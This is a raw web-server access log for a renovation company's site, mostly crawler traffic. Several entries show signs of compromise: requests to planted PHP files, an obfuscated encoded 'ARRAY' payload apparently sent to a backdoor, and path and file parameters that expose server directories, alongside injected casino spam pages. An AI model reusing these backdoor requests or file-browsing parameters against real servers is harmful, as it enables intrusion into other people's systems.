74.7.227.59 - - [01/Nov/2025:08:45:23 -0400] "GET /q-~171zS1w9PCnPcxADpEGswwUIDMaomqEKu46206/ HTTP/1.1" 200 4150 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
44.205.192.249 - - [01/Nov/2025:08:45:24 -0400] "GET /services/custom-renovations/?path=//proc/self/root/lib/.build-id/d7 HTTP/1.1" 200 4674 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
66.249.65.197 - - [01/Nov/2025:08:45:25 -0400] "GET /m152027450?srsltid=AfmBOovcjsmrWUKdwFmhAQ_1YOLFclyev_BkKL8Fa4-Z-rSsHfNzCo HTTP/1.1" 200 19031 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
199.188.200.18 - - [01/Nov/2025:08:40:28 -0400] "GET /tmp/tmp/index.php?ARRAY=7o2230223n313736323030343432382p2231223n22687474703n5p2s5p2s7n7334343676313373752r67697665656r63652r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736323030303832382q3562616431616539393062373238353666626465346433363831663365386139222p2232223n226537363732306562613137633034343263643834636339323834626464303763222p2233223n223433636166353462343930386234303338313861353963386339653165303235222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33352q36302q37302q37322q38312q3132227q HTTP/1.1" 200 0 "-" "-"
18.214.238.178 - - [01/Nov/2025:08:45:27 -0400] "GET /services/door-wrapping/?path=//usr/lib/gems HTTP/1.1" 200 3315 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.59 - - [01/Nov/2025:08:45:28 -0400] "GET /q-~153pCmsYLvK3QQjtsTFbTeZnFcIxlL3xH49232/ HTTP/1.1" 200 4143 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.223 - - [01/Nov/2025:08:45:30 -0400] "GET /?path=//proc/self/root/proc/2966092/root/opt/cloudlinux-linksafe HTTP/1.1" 200 2829 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.65.197 - - [01/Nov/2025:08:45:31 -0400] "GET /m262028664?srsltid=AfmBOorIMLtuMexUn7mhZx_iVN54kOIqr_vfAiJDEb-D-JFfQwerR1 HTTP/1.1" 200 19806 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
18.207.89.138 - - [01/Nov/2025:08:45:32 -0400] "GET /funciona-maquinas-tragamonedas-en-linea-sin-cargo-en-el-caso-de-revision-baywatch-que-nos-lo-olvidemos-joviales-dinero-positivo/?path=//opt/alt/tests/alt-php83-pecl-trader_0.5.1-1.el8 HTTP/1.1" 200 3351 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.59 - - [01/Nov/2025:08:45:32 -0400] "GET /q-~38agHCJthBobmvcK2FyfoSyURih06rKP35439/ HTTP/1.1" 200 4152 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
23.21.175.228 - - [01/Nov/2025:08:45:35 -0400] "GET /portfolio-commercial?path=//usr/share/locale/tup HTTP/1.1" 200 3342 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
66.249.65.197 - - [01/Nov/2025:08:45:36 -0400] "GET /q-~206V5E9PhT8lg4kcfgOhStCULxHBSqURI49785/ HTTP/1.1" 200 4149 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
69.197.179.242 - - [01/Nov/2025:08:45:35 -0400] "GET /wp-content/x072d63/index.php?id=893896 HTTP/1.1" 200 0 "https://creativefinishings.com/wp-content/x072d63/index.php?id=893896" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
74.7.227.223 - - [01/Nov/2025:08:45:38 -0400] "GET /?path=//proc/self/root/proc/2966092/root/etc/skel HTTP/1.1" 403 1242 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.59 - - [01/Nov/2025:08:45:38 -0400] "GET /q-~103XdrvobpRjGxIuwKbrxzOG2PeTdYK0v43560/ HTTP/1.1" 200 4149 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
52.3.156.186 - - [01/Nov/2025:08:45:40 -0400] "GET /services/window-tinting/?path=//opt/imunify360/venv/lib/python3.11/site-packages/peewee_migrate HTTP/1.1" 200 4083 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
52.167.144.213 - - [01/Nov/2025:08:45:40 -0400] "GET /items/237648152.htm HTTP/1.1" 200 17 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
74.7.227.59 - - [01/Nov/2025:08:45:43 -0400] "GET /q-~271Zrdv6WTVaWKsTcyVvhb8UVSgBLrYiy39458/ HTTP/1.1" 200 4151 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
3.227.180.70 - - [01/Nov/2025:08:45:43 -0400] "GET /beste-versorger-provision/?path=//opt/alt/alt-nodejs16/root/usr/share/locale/bg_BG/LC_MESSAGES HTTP/1.1" 200 3106 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.223 - - [01/Nov/2025:08:45:44 -0400] "GET /?path=//proc/self/root/proc/2966092/root/opt/cpanel/libcurl/include HTTP/1.1" 200 2564 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.65.197 - - [01/Nov/2025:08:45:46 -0400] "GET /q-~25GNWhyh5iOPMEkivTL9T37S7DFSG34j47026/ HTTP/1.1" 200 19589 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
199.188.200.18 - - [01/Nov/2025:08:40:48 -0400] "GET /tmp/tmp/index.php?ARRAY=7o2230223n313736323030343434382p2231223n22687474703n5p2s5p2s7n7334343676313373752r67697665656r63652r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736323030303834382q3362633864353563633237396631336139316532336661663564363037653037222p2232223n226537363732306562613137633034343263643834636339323834626464303763222p2233223n223433636166353462343930386234303338313861353963386339653165303235222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33352q36302q37302q37322q38312q3132227q HTTP/1.1" 200 0 "-" "-"
44.215.61.66 - - [01/Nov/2025:08:45:48 -0400] "GET /spielsaal-qua-1-euroletten-einzahlung-2025-unser-besten-angebote-as-part-of-deutschland/?path=//proc/self/root/opt/alt/php81/link HTTP/1.1" 200 3355 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.59 - - [01/Nov/2025:08:45:48 -0400] "GET /q-~92PWcNCKUkAdbDT5d0u7MuiajkHcOoEn10163/?path=/home/creaqbdc/public_html/wp-content HTTP/1.1" 200 3199 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.65.197 - - [01/Nov/2025:08:45:48 -0400] "GET /q-~26AQtZR1Pd3RcruIi0ppwEf5CY6Jj7GI17043/ HTTP/1.1" 200 4136 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
98.84.200.43 - - [01/Nov/2025:08:45:51 -0400] "GET /services/window-tinting/?path=//home/creaqbdc/lscache/priv/3 HTTP/1.1" 200 3038 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
66.249.65.197 - - [01/Nov/2025:08:45:52 -0400] "GET /q-~296Kod52B2QMhxZ0x4fzNQDMXQrkLdO4h18423/ HTTP/1.1" 200 18388 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.65.197 - - [01/Nov/2025:08:45:53 -0400] "GET /?q=2148186115800&channel=199e08&from=https://creativefinishings.com/select.cgi?q-~17bPrHi0JW6N5swpB59R3E70mJs33GqJ2202/ HTTP/1.1" 200 18736 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.7.227.223 - - [01/Nov/2025:08:45:54 -0400] "GET /?path=//proc/self/root/proc/2966092/root/opt/ai-bolit HTTP/1.1" 200 3540 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.59 - - [01/Nov/2025:08:45:54 -0400] "GET /q-~97ZDEF0QAKg5zzkYIVdifUS3ItpUYUrz24358/ HTTP/1.1" 200 4158 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
18.213.70.100 - - [01/Nov/2025:08:45:55 -0400] "GET /contact-us/?path=//usr/lib/.build-id/a7 HTTP/1.1" 200 4621 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.59 - - [01/Nov/2025:08:45:59 -0400] "GET /q-~115JPnskEguKDnhbr2cRqI3Hlb8lWTVmf5692/ HTTP/1.1" 200 4130 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.65.197 - - [01/Nov/2025:08:45:59 -0400] "GET /m135001433?srsltid=AfmBOogWZDzZavhRNd64Qr_791DaZZyA1_1MF3SSqU-P-dx11l0udo HTTP/1.1" 200 18798 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
34.236.185.101 - - [01/Nov/2025:08:46:00 -0400] "GET /was-auch-immer-via-spielbank-einzahlung-uber-telefonrechnung-land-der-dichter-und-denker/?path=//opt/cloudlinux/alt-php53/root/link HTTP/1.1" 200 3355 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.223 - - [01/Nov/2025:08:46:03 -0400] "GET /?path=//proc/self/root/proc/2966092/root/etc/my.cnf.d HTTP/1.1" 403 1242 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.59 - - [01/Nov/2025:08:46:03 -0400] "GET /q-~15gAEC4zZnwcUHvRwcbuEjDZvm71SzLd37630/ HTTP/1.1" 200 4144 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
54.225.81.20 - - [01/Nov/2025:08:46:03 -0400] "GET /a-journey-through-timeless-realms-in-crash-x-game/?path=//opt/hc_python/lib/python3.12/site-packages/wheel HTTP/1.1" 200 4052 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
66.249.65.197 - - [01/Nov/2025:08:46:05 -0400] "GET /q-~247Tc2jhoskGoFttKJG99eIWXSwXD6XnB49598/ HTTP/1.1" 200 18984 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
199.188.200.18 - - [01/Nov/2025:08:41:08 -0400] "GET /tmp/tmp/index.php?ARRAY=7o2230223n313736323030343436382p2231223n22687474703n5p2s5p2s7n7334343676313373752r67697665656r63652r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736323030303836382q3161393965663266636565653263303933333364336439343139353333643835222p2232223n226537363732306562613137633034343263643834636339323834626464303763222p2233223n223433636166353462343930386234303338313861353963386339653165303235222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33352q36302q37302q37322q38312q3132227q HTTP/1.1" 200 0 "-" "-"
74.7.227.59 - - [01/Nov/2025:08:46:07 -0400] "GET /q-~271Zrdv6WTVaWKsTcyVvhb8UVSgBLrYiy39458/?fileloc=/home/creaqbdc/public_html/class-.php&path=/home/creaqbdc/public_html HTTP/1.1" 200 5350 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
3.235.215.92 - - [01/Nov/2025:08:46:07 -0400] "GET /beste-versorger-provision/?fileloc=//lib/locale/en_NG/LC_NUMERIC&path=//lib/locale/en_NG HTTP/1.1" 200 3015 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
69.197.179.242 - - [01/Nov/2025:08:46:08 -0400] "GET /wp-includes/plf56b4b/edit.php?id=836336 HTTP/1.1" 200 0 "https://creativefinishings.com/wp-includes/plf56b4b/edit.php?id=836336" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.65.197 - - [01/Nov/2025:08:46:11 -0400] "GET /m187032235?srsltid=AfmBOoYLcvaiumFZqL3s4K_e2HKDsxKvb_VMpswHpL-A-4ayR4CzCs HTTP/1.1" 200 19899 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
34.206.193.60 - - [01/Nov/2025:08:46:11 -0400] "GET /portfolio-commercial?path=//usr/lib/rpm/platform/mipsr6el-linux HTTP/1.1" 200 3363 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.223 - - [01/Nov/2025:08:46:12 -0400] "GET /?path=//proc/self/root/proc/2966092/root/opt/cloudlinux/venv/usr HTTP/1.1" 200 2868 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.59 - - [01/Nov/2025:08:46:12 -0400] "GET /q-~293FzMXwA70mlxVeQdbkqUsFJwDOLebZB44584/ HTTP/1.1" 200 4147 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.65.197 - - [01/Nov/2025:08:46:15 -0400] "GET /?q=2148186115800&channel=199e08&from=https://creativefinishings.com/select.cgi?q-~228X9lJ46fVjh28uW27CicZbdyBjoYIYK22123/ HTTP/1.1" 200 20535 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
3.230.69.161 - - [01/Nov/2025:08:46:15 -0400] "GET /spielbank-pramie-ohne-einzahlung-beste-no-vorleistung-boni-2025/?path=//opt/alt/tests/alt-php82-pecl-oauth_2.0.7-2.el8/tests HTTP/1.1" 200 4216 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
66.249.65.197 - - [01/Nov/2025:08:46:18 -0400] "GET /m181018479?srsltid=AfmBOoFoFsOjQNBUIm6g3I_YcZabOprlP_DRfHhJ2X-D-W7ogAqbYx HTTP/1.1" 200 19844 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.65.197 - - [01/Nov/2025:08:46:18 -0400] "GET /q-~156XRHrsu3Du0WKkCB6XSYLLhNCu3fCPK38965/ HTTP/1.1" 200 18986 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
35.169.119.108 - - [01/Nov/2025:08:46:19 -0400] "GET /services/renovation-contractor/?path=//lib/systemd/system/runlevel2.target.wants HTTP/1.1" 200 3046 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.223 - - [01/Nov/2025:08:46:22 -0400] "GET /?fileloc=//proc/self/root/proc/2966092/root/opt/cloudlinux/venv/bin/pytest&path=//proc/self/root/proc/2966092/root/opt/cloudlinux/venv/bin HTTP/1.1" 200 2647 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.65.197 - - [01/Nov/2025:08:46:24 -0400] "GET /q-~8AEsY5SFSa5dv35vxQfZeQKgkSGAi4h41773/ HTTP/1.1" 200 18366 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
52.0.41.164 - - [01/Nov/2025:08:46:23 -0400] "GET /domaine-des-jeux-de-couronnes-captivants/?path=//opt/cloudlinux/alt-php56 HTTP/1.1" 200 3442 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
66.249.65.197 - - [01/Nov/2025:08:46:26 -0400] "GET /q-~285IG0SXn1X7Fx8qlhpUFBu9wGRQUInHz16370/ HTTP/1.1" 200 4149 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
3.212.86.97 - - [01/Nov/2025:08:46:27 -0400] "GET /aventuras-brillantes-en-el-mundo-del-oscar-spin/?path=//usr/lib/.build-id/9d HTTP/1.1" 200 4875 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.59 - - [01/Nov/2025:08:46:28 -0400] "GET /q-~261uNMQDLSCo8eSstMY7mJwAlhGRt7BCL9554/ HTTP/1.1" 200 4130 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
199.188.200.18 - - [01/Nov/2025:08:41:30 -0400] "GET /tmp/tmp/index.php?ARRAY=7o2230223n313736323030343439302p2231223n22687474703n5p2s5p2s7n7334343676313373752r67697665656r63652r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736323030303839302q6335393734623735643766313261323964636633393530333038346637646661222p2232223n226537363732306562613137633034343263643834636339323834626464303763222p2233223n223433636166353462343930386234303338313861353963386339653165303235222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33352q36302q37302q37322q38312q3132227q HTTP/1.1" 200 0 "-" "-"
66.249.65.197 - - [01/Nov/2025:08:46:30 -0400] "GET /?q=2148186115800&channel=199e08&from=https://creativefinishings.com/select.cgi?q-~2ZbUPpY25j79OiN7zwxm59JJb6bR7Gt559/ HTTP/1.1" 200 18773 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.65.197 - - [01/Nov/2025:08:46:30 -0400] "GET /q-~155e8qkUyYRVCDbzs2e8oOicTPzcElamv43884/ HTTP/1.1" 200 19469 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.7.227.223 - - [01/Nov/2025:08:46:30 -0400] "GET /?path=//proc/self/root/proc/2966092/root/opt/cloudlinux/venv/include HTTP/1.1" 200 2839 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
3.219.80.71 - - [01/Nov/2025:08:46:32 -0400] "GET /services/wrapping-services/?path=//home/creaqbdc/.cagefs/opt/alt/php55/link HTTP/1.1" 200 3384 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
50.17.193.48 - - [01/Nov/2025:08:46:35 -0400] "GET /spielbank-pramie-ohne-einzahlung-beste-no-vorleistung-boni-2025/?path=//opt/alt/ruby25/lib64 HTTP/1.1" 200 3575 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
66.249.65.197 - - [01/Nov/2025:08:46:36 -0400] "GET /q-~100DDXrHcQFMtvkJfmXRJqqqonGjITxjZ42521/ HTTP/1.1" 200 18989 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.65.197 - - [01/Nov/2025:08:46:38 -0400] "GET /m084015514?srsltid=AfmBOoFhplbefkKr8ZbMSO_FLGx36NaWD_oCgPDZHf-T-0nKTWYuA9 HTTP/1.1" 200 19279 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.65.197 - - [01/Nov/2025:08:46:38 -0400] "GET /q-~86Lx5ccYbkuJ6npuuJzfzx77JpZ9FT4K585/ HTTP/1.1" 200 4141 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
74.7.227.223 - - [01/Nov/2025:08:46:39 -0400] "GET /?path=//proc/self/root/proc/2966092/root/opt/cpanel/ea-libzip HTTP/1.1" 200 2810 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.65.197 - - [01/Nov/2025:08:46:40 -0400] "GET /q-~285GFaPUT5gZOq0SnvlZ64tPGk5CIEh4h5516/ HTTP/1.1" 200 19735 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
34.226.89.140 - - [01/Nov/2025:08:46:39 -0400] "GET /a-cosmic-journey-through-the-realm-of-space-xy/?fileloc=//home/creaqbdc/public_html/wp-includes/fonts/dashicons.woff2&path=//home/creaqbdc/public_html/wp-includes/fonts HTTP/1.1" 200 3004 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
3.208.156.9 - - [01/Nov/2025:08:46:43 -0400] "GET /portfolio-commercial/?path=//usr/lib/rpm/platform/mipsr6el-linux HTTP/1.1" 200 3370 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.11 - - [01/Nov/2025:08:46:46 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FHttpKernel%2FCacheWarmer%2FCacheWarmerAggregate.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FHttpKernel%2FCacheWarmer HTTP/1.1" 200 3105 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:46:46 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints%2FNull.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FValidator%2FConstraints HTTP/1.1" 200 2811 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:46:46 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FHttpFoundation%2FSession%2FSessionBagInterface.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FHttpFoundation%2FSession HTTP/1.1" 200 2929 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:46:46 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FDependencyInjection%2FCompiler%2FPassConfig.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FDependencyInjection%2FCompiler HTTP/1.1" 200 3793 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
